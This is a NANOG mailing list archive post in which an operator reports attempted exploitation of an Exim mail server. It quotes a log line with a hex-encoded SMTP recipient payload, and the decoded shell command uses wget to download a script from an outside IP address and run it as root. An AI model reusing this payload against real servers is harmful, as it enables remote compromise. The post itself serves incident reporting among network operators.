nanog mailing list archives
Re: Russian Anal Probing + Malware
From: Andy Smith <andy () strugglers net>
Date: Sun, 23 Jun 2019 04:04:13 +0000
Hello, On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
What malware slinging?
Some user there is trying to exploit CVE-2018-10149:
2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised):
rejected "RCPT
TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>"
H=(myhostname) [89.248.171.57] next input="QUIT\n"
Plus another 17 attempts by that IP through to 19 June.
$ printf
"\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"
(I replaced https with hxxps to prevent auto-link-followers from
hitting the site.)
Cheers,
Andy
Current thread:
- Russian Anal Probing + Malware Ronald F. Guilmette (Jun 21)
- RE: Russian Anal Probing + Malware Keith Medcalf (Jun 22)
- Re: Russian Anal Probing + Malware Troy Mursch (Jun 22)
- Re: Russian Anal Probing + Malware Andy Smith (Jun 22)
- Re: Russian Anal Probing + Malware Ronald F. Guilmette (Jun 22)
- Re: Russian Anal Probing + Malware Filip Hruska (Jun 22)
- Re: Russian Anal Probing + Malware Dan Hollis (Jun 23)
- Re: Russian Anal Probing + Malware Randy Bush (Jun 23)
- Re: Russian Anal Probing + Malware Dan Hollis (Jun 23)
- Re: Russian Anal Probing + Malware Hank Nussbacher (Jun 23)
- Re: Russian Anal Probing + Malware Tom Beecher (Jun 24)
- Re: Russian Anal Probing + Malware Dan Hollis (Jun 23)
- RE: Russian Anal Probing + Malware Keith Medcalf (Jun 22)
- Re: Russian Anal Probing + Malware Andy Smith (Jun 23)